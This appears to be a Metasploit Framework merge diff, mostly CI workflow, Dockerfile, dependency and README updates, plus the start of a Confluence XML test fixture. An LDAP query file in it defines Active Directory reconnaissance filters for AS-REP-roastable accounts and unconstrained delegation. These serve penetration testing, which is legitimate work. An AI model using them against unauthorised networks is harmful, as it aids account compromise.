Land #18980 , improves basic shell help command

automatic module_metadata_base.json update
Land #18618 , Add OpenNMS privesc and auth RCE
2024-03-20 21:27:12 +00:00 · 2024-03-20 15:10:21 -05:00 · 2024-03-20 12:54:16 -07:00 · 2024-03-20 14:18:36 -05:00 · 2024-03-20 19:11:18 +00:00 · 2024-03-20 18:49:33 +00:00
923 changed files with 59444 additions and 10656 deletions
@@ -38,7 +38,9 @@ on:
      - 'lib/msf/core/**'
      - 'tools/dev/**'
      - 'spec/acceptance/**'
+      - 'spec/support/acceptance/**'
      - 'spec/acceptance_spec_helper.rb'
+      - '.github/**'
 #   Example of running as a cron, to weed out flaky tests
 #  schedule:
 #    - cron: '*/15 * * * *'
@@ -63,10 +65,10 @@ jobs:
          # Java - newer versions of Java are not supported currently: https://github.com/rapid7/metasploit-payloads/issues/647
          - { name: java, runtime_version: 8 }

-          # PHP
-          - { name: php, runtime_version: 5.3 }
-          - { name: php, runtime_version: 7.4 }
-          - { name: php, runtime_version: 8.2 }
+          # PHP - Temporarily removed as tests are timing out on Github actions
+          # - { name: php, runtime_version: 5.3 }
+          # - { name: php, runtime_version: 7.4 }
+          # - { name: php, runtime_version: 8.2 }
        include:
          # Windows Meterpreter
          - { meterpreter: { name: windows_meterpreter }, os: windows-2019 }
@@ -92,7 +94,7 @@ jobs:
        if: runner.os == 'Linux'
        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz

-      - uses: shivammathur/setup-php@5b29e8a45433c406b3902dff138a820a408c45b7
+      - uses: shivammathur/setup-php@6d7209f44a25a59e904b1ee9f3b0c33ab2cd888d
        if: ${{ matrix.meterpreter.name == 'php' }}
        with:
          php-version: ${{ matrix.meterpreter.runtime_version }}
@@ -100,11 +102,11 @@ jobs:

      - name: Set up Python
        if: ${{ matrix.meterpreter.name == 'python' }}
-        uses: actions/setup-python@v4
+        uses: actions/setup-python@v5
        with:
          python-version: ${{ matrix.meterpreter.runtime_version }}

-      - uses: actions/setup-java@v3
+      - uses: actions/setup-java@v4
        if: ${{ matrix.meterpreter.name == 'java' }}
        with:
          distribution: temurin
@@ -126,7 +128,7 @@ jobs:
          type %WINDIR%\\system32\\drivers\\etc\\hosts

      - name: Checkout code
-        uses: actions/checkout@v3
+        uses: actions/checkout@v4

      - name: Setup Ruby
        env:
@@ -153,11 +155,11 @@ jobs:
        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
        run: |
-          bundle exec rspec spec/acceptance/
+          bundle exec rspec spec/acceptance/meterpreter_spec.rb

      - name: Archive results
        if: always()
-        uses: actions/upload-artifact@v3
+        uses: actions/upload-artifact@v4
        with:
          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
          name: raw-data-${{ matrix.meterpreter.name }}-${{ matrix.meterpreter.runtime_version }}-${{ matrix.os }}
@@ -172,7 +174,7 @@ jobs:

    steps:
      - name: Checkout code
-        uses: actions/checkout@v3
+        uses: actions/checkout@v4
        if: always()

      - name: Install system dependencies (Linux)
@@ -186,14 +188,14 @@ jobs:
          BUNDLE_FORCE_RUBY_PLATFORM: true
        uses: ruby/setup-ruby@v1
        with:
-          ruby-version: 3.0.2
+          ruby-version: '${{ matrix.ruby }}'
          bundler-cache: true
          cache-version: 4
          # Github actions with Ruby requires Bundler 2.2.18+
          # https://github.com/ruby/setup-ruby/tree/d2b39ad0b52eca07d23f3aa14fdf2a3fcc1f411c#windows
          bundler: 2.2.33

-      - uses: actions/download-artifact@v3
+      - uses: actions/download-artifact@v4
        id: download
        if: always()
        with:
@@ -216,7 +218,7 @@ jobs:

      - name: archive results
        if: always()
-        uses: actions/upload-artifact@v3
+        uses: actions/upload-artifact@v4
        with:
          name: final-report-${{ github.run_id }}
          path: |
@@ -43,7 +43,7 @@ jobs:
    name: Ruby ${{ matrix.ruby }}
    steps:
      - name: Checkout code
-        uses: actions/checkout@v3
+        uses: actions/checkout@v4

      - name: Setup Ruby
        uses: ruby/setup-ruby@v1
@@ -43,7 +43,7 @@ jobs:
        run: sudo apt-get install libpcap-dev graphviz

      - name: Checkout code
-        uses: actions/checkout@v3
+        uses: actions/checkout@v4
        # Required to checkout HEAD^ and 3a046f01dae340c124dd3895e670983aef5fe0c5 for the msftidy script
        # https://github.com/actions/checkout/tree/5a4ac9002d0be2fb38bd78e4b4dbde5606d7042f#checkout-head
        with:
@@ -0,0 +1,182 @@
+name: Acceptance
+
+# Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
+#concurrency:
+#  group: ${{ github.ref }}-${{ github.workflow }}
+#  cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
+
+# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
+permissions:
+  actions: none
+  checks: none
+  contents: none
+  deployments: none
+  id-token: none
+  issues: none
+  discussions: none
+  packages: none
+  pages: none
+  pull-requests: none
+  repository-projects: none
+  security-events: none
+  statuses: none
+
+on:
+  push:
+    branches-ignore:
+      - gh-pages
+      - metakitty
+  pull_request:
+    branches:
+      - '*'
+    paths:
+      - 'metsploit-framework.gemspec'
+      - 'Gemfile.lock'
+      - '**/**postgres**'
+      - 'spec/acceptance/**'
+      - 'spec/support/acceptance/**'
+      - 'spec/acceptance_spec_helper.rb'
+#   Example of running as a cron, to weed out flaky tests
+#  schedule:
+#    - cron: '*/15 * * * *'
+
+jobs:
+  postgres:
+    runs-on: ${{ matrix.os }}
+    timeout-minutes: 40
+
+    services:
+      postgres:
+        image: ${{ matrix.docker_image }}
+        ports: ["5432:5432"]
+        env:
+          POSTGRES_USER: postgres
+          POSTGRES_PASSWORD: password
+        options: >-
+          --health-cmd pg_isready
+          --health-interval 10s
+          --health-timeout 5s
+          --health-retries 5
+
+    strategy:
+      fail-fast: true
+      matrix:
+        ruby:
+          - '3.2'
+        os:
+          - ubuntu-latest
+        docker_image:
+          - postgres:9.4
+          - postgres:16.2
+
+    env:
+      RAILS_ENV: test
+
+    name: ${{ matrix.docker_image }} - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
+    steps:
+      - name: Install system dependencies
+        run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz
+
+      - name: Checkout code
+        uses: actions/checkout@v4
+
+      - name: Setup Ruby
+        env:
+          BUNDLE_WITHOUT: "coverage development pcap"
+          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
+          BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+
+      - name: Extract runtime version
+        run: |
+          echo "RUNTIME_VERSION=$(echo $DOCKER_IMAGE | awk -F: '{ print $2 }')" >> $GITHUB_ENV
+          echo "DOCKER_IMAGE_FILENAME=$(echo $DOCKER_IMAGE | tr -d ':')" >> $GITHUB_ENV
+        env:
+          DOCKER_IMAGE: ${{ matrix.docker_image }}
+          OS: ${{ matrix.os }}
+
+      - name: acceptance
+        env:
+          SPEC_HELPER_LOAD_METASPLOIT: false
+          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
+          RUNTIME_VERSION: ${{ env.RUNTIME_VERSION }}
+        # Unix run command:
+        #   SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
+        # Windows cmd command:
+        #   set SPEC_HELPER_LOAD_METASPLOIT=false
+        #   bundle exec rspec .\spec\acceptance
+        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
+        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
+        run: |
+          bundle exec rspec spec/acceptance/postgres_spec.rb
+
+      - name: Archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
+          name: ${{ env.DOCKER_IMAGE_FILENAME }}-${{ matrix.os }}
+          path: tmp/allure-raw-data
+
+  # Generate a final report from the previous test results
+  report:
+    name: Generate report
+    needs:
+      - postgres
+    runs-on: ubuntu-latest
+    if: always()
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v4
+        if: always()
+
+      - name: Install system dependencies (Linux)
+        if: always()
+        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+
+      - name: Setup Ruby
+        if: always()
+        env:
+          BUNDLE_WITHOUT: "coverage development"
+          BUNDLE_FORCE_RUBY_PLATFORM: true
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+          cache-version: 4
+          # Github actions with Ruby requires Bundler 2.2.18+
+          # https://github.com/ruby/setup-ruby/tree/d2b39ad0b52eca07d23f3aa14fdf2a3fcc1f411c#windows
+          bundler: 2.2.33
+
+      - uses: actions/download-artifact@v4
+        id: download
+        if: always()
+        with:
+          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
+          path: raw-data
+
+      - name: allure generate
+        if: always()
+        run: |
+          export VERSION=2.22.1
+
+          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
+          tar -zxvf allure-$VERSION.tgz -C .
+
+          ls -la ${{steps.download.outputs.download-path}}
+          ./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
+
+          find ${{steps.download.outputs.download-path}}
+          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
+
+      - name: archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          name: final-report-${{ github.run_id }}
+          path: |
+            ./allure-report
@@ -33,7 +33,7 @@ jobs:
    name: Docker Build
    steps:
      - name: Checkout code
-        uses: actions/checkout@v3
+        uses: actions/checkout@v4

      - name: docker-compose build
        run: |
@@ -76,7 +76,7 @@ jobs:
        include:
          - os: ubuntu-latest
            ruby: '3.1'
-            test_cmd: 'bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" DATASTORE_FALLBACKS=1'
+            test_cmd: 'bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" MSF_FEATURE_DEFER_MODULE_LOADS=1'
        test_cmd:
          - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"
          - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"
@@ -93,7 +93,7 @@ jobs:
        run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz

      - name: Checkout code
-        uses: actions/checkout@v3
+        uses: actions/checkout@v4

      - name: Setup Ruby
        env:
@@ -1,7 +1,8 @@
-FROM ruby:3.0.5-alpine3.15 AS builder
+FROM ruby:3.1.4-alpine3.18 AS builder
 LABEL maintainer="Rapid7"

-ARG BUNDLER_CONFIG_ARGS="set clean 'true' set no-cache 'true' set system 'true' set without 'development test coverage'"
+ARG BUNDLER_CONFIG_ARGS="set no-cache 'true' set system 'true' set without 'development test coverage'"
+ARG BUNDLER_FORCE_CLEAN="true"
 ENV APP_HOME=/usr/src/metasploit-framework
 ENV TOOLS_HOME=/usr/src/tools
 ENV BUNDLE_IGNORE_MESSAGES="true"
@@ -33,8 +34,11 @@ RUN apk add --no-cache \
      go \
    && echo "gem: --no-document" > /etc/gemrc \
    && gem update --system \
-    && bundle config $BUNDLER_ARGS \
+    && bundle config $BUNDLER_CONFIG_ARGS \
    && bundle install --jobs=8 \
+    && if [ "${BUNDLER_FORCE_CLEAN}" == "true" ]; then \
+         bundle clean --force; \
+       fi \
    # temp fix for https://github.com/bundler/bundler/issues/6680
    && rm -rf /usr/local/bundle/cache \
    # needed so non root users can read content of the bundle
@@ -49,8 +53,9 @@ RUN mkdir -p $TOOLS_HOME/bin && \
    cd go/src && \
    ./make.bash

-FROM ruby:3.0.5-alpine3.15
+FROM ruby:3.1.4-alpine3.18
 LABEL maintainer="Rapid7"
+ARG TARGETARCH

 ENV APP_HOME=/usr/src/metasploit-framework
 ENV TOOLS_HOME=/usr/src/tools
@@ -62,7 +67,13 @@ RUN addgroup -S $METASPLOIT_GROUP

 RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs \
    postgresql-libs python3 py3-pip ncurses libcap su-exec alpine-sdk \
-    openssl-dev nasm mingw-w64-gcc
+    openssl-dev nasm
+RUN\
+    if [ "${TARGETARCH}" = "arm64" ];\
+	then apk add --no-cache gcc musl-dev python3-dev libffi-dev gcompat;\
+    else apk add --no-cache mingw-w64-gcc;\
+    fi
+

 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
@@ -52,3 +52,4 @@ group :test do
  # Manipulate Time.now in specs
  gem 'timecop'
 end
+
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.3.45)
+    metasploit-framework (6.4.0)
      actionpack (~> 7.0.0)
      activerecord (~> 7.0.0)
      activesupport (~> 7.0.0)
@@ -33,7 +33,7 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 2.0.159)
+      metasploit-payloads (= 2.0.166)
      metasploit_data_models
      metasploit_payloads-mettle (= 1.0.26)
      mqtt
@@ -60,6 +60,7 @@ PATH
      rb-readline
      recog
      redcarpet
+      reline
      rex-arch
      rex-bin_tools
      rex-core
@@ -80,7 +81,7 @@ PATH
      rex-zip
      ruby-macho
      ruby-mysql
-      ruby_smb (~> 3.2.0)
+      ruby_smb (~> 3.3.3)
      rubyntlm
      rubyzip
      sinatra
@@ -187,7 +188,7 @@ GEM
    debug (1.8.0)
      irb (>= 1.5.0)
      reline (>= 0.3.1)
-    diff-lcs (1.5.0)
+    diff-lcs (1.5.1)
    dnsruby (1.70.0)
      simpleidn (~> 0.2.1)
    docile (1.4.0)
@@ -264,7 +265,7 @@ GEM
      activesupport (~> 7.0)
      railties (~> 7.0)
      zeitwerk
-    metasploit-credential (6.0.6)
+    metasploit-credential (6.0.7)
      metasploit-concern
      metasploit-model
      metasploit_data_models (>= 5.0.0)
@@ -278,7 +279,7 @@ GEM
      activemodel (~> 7.0)
      activesupport (~> 7.0)
      railties (~> 7.0)
-    metasploit-payloads (2.0.159)
+    metasploit-payloads (2.0.166)
    metasploit_data_models (6.0.3)
      activerecord (~> 7.0)
      activesupport (~> 7.0)
@@ -377,7 +378,7 @@ GEM
      nokogiri
    redcarpet (3.6.0)
    regexp_parser (2.8.1)
-    reline (0.3.8)
+    reline (0.4.1)
      io-console (~> 0.5)
    require_all (3.0.0)
    rex-arch (0.1.15)
@@ -418,30 +419,30 @@ GEM
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.54)
+    rex-socket (0.1.56)
      rex-core
    rex-sslscan (0.1.10)
      rex-core
      rex-socket
      rex-text
    rex-struct2 (0.1.4)
-    rex-text (0.2.53)
+    rex-text (0.2.56)
    rex-zip (0.1.5)
      rex-text
    rexml (3.2.6)
    rkelly-remix (0.0.7)
-    rspec (3.12.0)
-      rspec-core (~> 3.12.0)
-      rspec-expectations (~> 3.12.0)
-      rspec-mocks (~> 3.12.0)
-    rspec-core (3.12.2)
-      rspec-support (~> 3.12.0)
-    rspec-expectations (3.12.3)
+    rspec (3.13.0)
+      rspec-core (~> 3.13.0)
+      rspec-expectations (~> 3.13.0)
+      rspec-mocks (~> 3.13.0)
+    rspec-core (3.13.0)
+      rspec-support (~> 3.13.0)
+    rspec-expectations (3.13.0)
      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.12.0)
-    rspec-mocks (3.12.6)
+      rspec-support (~> 3.13.0)
+    rspec-mocks (3.13.0)
      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.12.0)
+      rspec-support (~> 3.13.0)
    rspec-rails (6.0.3)
      actionpack (>= 6.1)
      activesupport (>= 6.1)
@@ -452,7 +453,7 @@ GEM
      rspec-support (~> 3.12)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.12.1)
+    rspec-support (3.13.0)
    rubocop (1.56.4)
      base64 (~> 0.1.1)
      json (~> 2.3)
@@ -473,8 +474,8 @@ GEM
    ruby-progressbar (1.13.0)
    ruby-rc4 (0.1.5)
    ruby2_keywords (0.0.5)
-    ruby_smb (3.2.6)
-      bindata
+    ruby_smb (3.3.4)
+      bindata (= 2.4.15)
      openssl-ccm
      openssl-cmac
      rubyntlm
@@ -544,7 +545,7 @@ GEM
      activesupport (>= 4.2, < 8.0)
    xmlrpc (0.3.3)
      webrick
-    yard (0.9.34)
+    yard (0.9.36)
    zeitwerk (2.6.12)

 PLATFORMS
@@ -38,7 +38,7 @@ crass, 1.0.6, MIT
 daemons, 1.4.1, MIT
 date, 3.3.3, "ruby, Simplified BSD"
 debug, 1.8.0, "ruby, Simplified BSD"
-diff-lcs, 1.5.0, "MIT, Artistic-2.0, GPL-2.0+"
+diff-lcs, 1.5.1, "MIT, Artistic-2.0, GPL-2.0-or-later"
 dnsruby, 1.70.0, "Apache 2.0"
 docile, 1.4.0, MIT
 domain_name, 0.5.20190701, "Simplified BSD, New BSD, Mozilla Public License 2.0"
@@ -79,10 +79,10 @@ macaddr, 1.7.2, ruby
 memory_profiler, 1.0.1, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 5.0.2, "New BSD"
-metasploit-credential, 6.0.6, "New BSD"
-metasploit-framework, 6.3.45, "New BSD"
+metasploit-credential, 6.0.7, "New BSD"
+metasploit-framework, 6.3.61, "New BSD"
 metasploit-model, 5.0.2, "New BSD"
-metasploit-payloads, 2.0.159, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 2.0.166, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 6.0.3, "New BSD"
 metasploit_payloads-mettle, 1.0.26, "3-clause (or ""modified"") BSD"
 method_source, 1.0.0, MIT
@@ -134,7 +134,7 @@ rb-readline, 0.5.5, BSD
 recog, 3.1.2, unknown
 redcarpet, 3.6.0, MIT
 regexp_parser, 2.8.1, MIT
-reline, 0.3.8, ruby
+reline, 0.4.1, ruby
 require_all, 3.0.0, MIT
 rex-arch, 0.1.15, "New BSD"
 rex-bin_tools, 0.1.9, "New BSD"
@@ -149,20 +149,20 @@ rex-powershell, 0.1.99, "New BSD"
 rex-random_identifier, 0.1.11, "New BSD"
 rex-registry, 0.1.5, "New BSD"
 rex-rop_builder, 0.1.5, "New BSD"
-rex-socket, 0.1.54, "New BSD"
+rex-socket, 0.1.56, "New BSD"
 rex-sslscan, 0.1.10, "New BSD"
 rex-struct2, 0.1.4, "New BSD"
-rex-text, 0.2.53, "New BSD"
+rex-text, 0.2.56, "New BSD"
 rex-zip, 0.1.5, "New BSD"
 rexml, 3.2.6, "Simplified BSD"
 rkelly-remix, 0.0.7, MIT
-rspec, 3.12.0, MIT
-rspec-core, 3.12.2, MIT
-rspec-expectations, 3.12.3, MIT
-rspec-mocks, 3.12.6, MIT
+rspec, 3.13.0, MIT
+rspec-core, 3.13.0, MIT
+rspec-expectations, 3.13.0, MIT
+rspec-mocks, 3.13.0, MIT
 rspec-rails, 6.0.3, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.12.1, MIT
+rspec-support, 3.13.0, MIT
 rubocop, 1.56.4, MIT
 rubocop-ast, 1.29.0, MIT
 ruby-macho, 4.0.0, MIT
@@ -171,7 +171,7 @@ ruby-prof, 1.4.2, "Simplified BSD"
 ruby-progressbar, 1.13.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.2.6, "New BSD"
+ruby_smb, 3.3.2, "New BSD"
 rubyntlm, 0.6.3, MIT
 rubyzip, 2.3.2, "Simplified BSD"
 sawyer, 0.9.2, MIT
@@ -207,5 +207,5 @@ windows_error, 0.1.5, BSD
 winrm, 2.3.6, "Apache 2.0"
 xdr, 3.0.3, "Apache 2.0"
 xmlrpc, 0.3.3, "ruby, Simplified BSD"
-yard, 0.9.34, MIT
+yard, 0.9.36, MIT
 zeitwerk, 2.6.12, MIT
@@ -34,10 +34,8 @@ Using Metasploit
 --
 Metasploit can do all sorts of things. The first thing you'll want to do
 is start `msfconsole`, but after that, you'll probably be best served by
-reading [Metasploit Unleashed][unleashed], the [great community
-resources](https://metasploit.github.io), or take a look at the
-[Using Metasploit](https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html)
-page on the documentation website.
+reading the basics of [using Metasploit](https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html)
+or [Metasploit Unleashed][unleashed].

 Contributing
 --
@@ -135,7 +135,7 @@ queries:
      - https://www.netspi.com/blog/technical/network-penetration-testing/exploiting-adidns/
      - https://github.com/dirkjanm/krbrelayx/blob/master/dnstool.py
  - action: ENUM_DNS_ZONES
-    description: 'Dump info about DNS zones the server knows about using the dnsZone object class under the DC DomainDnsZones. This is needed as without this BASEDN prefix we often miss certain entries.'
+    description: 'Dump all known DNS zones using the dnsZone object class under the DC DomainDnsZones. Without A BASEDN prefix you can miss certain entries.'
    filter: '(objectClass=dnsZone)'
    base_dn_prefix: 'DC=DomainDnsZones'
    attributes:
@@ -224,6 +224,7 @@ queries:
      - adminCount
      - managedBy
      - groupAttributes
+      - objectSID
    references:
      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
  - action: ENUM_GROUP_POLICY_OBJECTS
@@ -292,7 +293,7 @@ queries:
    references:
      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
  - action: ENUM_UNCONSTRAINED_DELEGATION
-    description: 'Dump info about all known objects that allow uncontrained delegation.'
+    description: 'Dump info about all known objects that allow unconstrained delegation.'
    filter: '(userAccountControl:1.2.840.113556.1.4.803:=524288)'
    attributes:
      - cn
@@ -325,7 +326,7 @@ queries:
    references:
      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
  - action: ENUM_USER_ASREP_ROASTABLE
-    description: 'Dump info about all users who are configured not to require kerberos pre-authentication and are therefore AS-REP roastable.'
+    description: 'Dump all users who are configured not to require kerberos pre-authentication, i.e. AS-REP roastable.'
    filter: '(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))'
    attributes:
      - cn
@@ -16,6 +16,8 @@ services:
    enabled: yes
  - type: IMAP
    enabled: yes
+  - type: LDAP
+    enabled: yes
  - type: MSSQL
    enabled: yes
  - type: MySQL
@@ -0,0 +1,4685 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<hibernate-generic datetime="2023-11-09 06:05:20">
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196658</id>
+<property name="destinationPageTitle"><![CDATA[Lay out your page (step 6 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[lay out your page (step 6 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98332</id>
+</property>
+<property name="creator" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModifier" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
+</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196654</id>
+<property name="destinationPageTitle"><![CDATA[Let's edit this page (step 3 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[let's edit this page (step 3 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98332</id>
+</property>
+<property name="creator" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModifier" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
+</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196655</id>
+<property name="destinationPageTitle"><![CDATA[Welcome to Confluence]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[welcome to confluence]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98332</id>
+</property>
+<property name="creator" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModifier" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
+</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196656</id>
+<property name="destinationPageTitle"><![CDATA[Get serious with a table (step 5 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[get serious with a table (step 5 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98332</id>
+</property>
+<property name="creator" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModifier" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
+</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196657</id>
+<property name="destinationPageTitle"><![CDATA[Prettify the page with an image (step 4 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[prettify the page with an image (step 4 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98332</id>
+</property>
+<property name="creator" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModifier" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
+</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196650</id>
+<property name="destinationPageTitle"><![CDATA[Let's edit this page (step 3 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[let's edit this page (step 3 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98322</id>
+</property>
+<property name="creator" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModifier" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
+</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196651</id>
+<property name="destinationPageTitle"><![CDATA[What is Confluence? (step 1 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[what is confluence? (step 1 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98322</id>
+</property>
+<property name="creator" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModifier" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
+</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196652</id>
+<property name="destinationPageTitle"><![CDATA[A quick look at the editor (step 2 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[a quick look at the editor (step 2 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
